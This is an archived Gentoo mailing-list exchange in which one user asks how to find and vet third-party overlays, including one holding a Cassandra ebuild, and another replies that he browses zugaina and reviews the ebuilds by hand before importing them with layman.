On 06/08/2015 03:27, James wrote: > OK so yes I know overlays in the wild can be disastrous. > Reading the devmanual while parsing through various ebuilds > both portage and in the wild, does make for some interesting > reading:: ymmv. > > I'm not sure my overlay (kung_fu) is complete. > > > 'layman -L' lists reasonably qualified overlay sites; but you > have to add them to search out their content directly. > > 'eix -R <keywordname> ' will search far and wide for a given > overlay; like the distributed database 'cassandra. > > Some googling suggest that zugaina contains a master list of overlays? > (not sure how true this is). > > I'm not sure if 'eix -R' or 'browsing zugaina' provides the widest possible > list of (mostly safe) overlay sites. > > Last, googling for the name + ebuild or overlay can find packages, > but if the archive (git etc) is not listed with a layman -L:: be > very cautious.... audit the details of the overlay. > > Specifically, on dev-db/cassandara I find 2.1.3 and 2.12 > ([5] "spike-community-overlay" layman/spike-community-overlay) > > but the cassandra.apache.org site shows 2.1.8 and 2.20 as the > stable and testing downloads currently available. So is it safe > to use the "spike-community" overlay as a basis to update the cassandra > ebuild I have available? > > In general, is there a list (even a private list) of know good/bad > actors on these overlay sites? > > > Any further tidbits on searching out and qualifying overlays (yes > I know only a full code audit is actually safe) that folks use > or would suggest would be keen. I did see some gentoo wiki pages on the > subject but they seem terse or dated.
To find Joe Random Hacker's overlay and see what's in it, I tend to browse zugaina. Coverage is decent and most stuff from most folks active in the Gentoo ecosystem is there. If an overlay is not listed on zugaina, these days it tends to be on github or similar. I usually just do a git checkout and cast my own eyeballs over the ebuilds. If I'm happy, import into layman (I think it's -o) with the xml file that should be provided Thus far I've had good success. As with everything else in Gentoo it's buyer beware, and train your eyeballs and brain beforehand. There does not seem to be an easy shortcuts. -- Alan McKinnon [email protected]
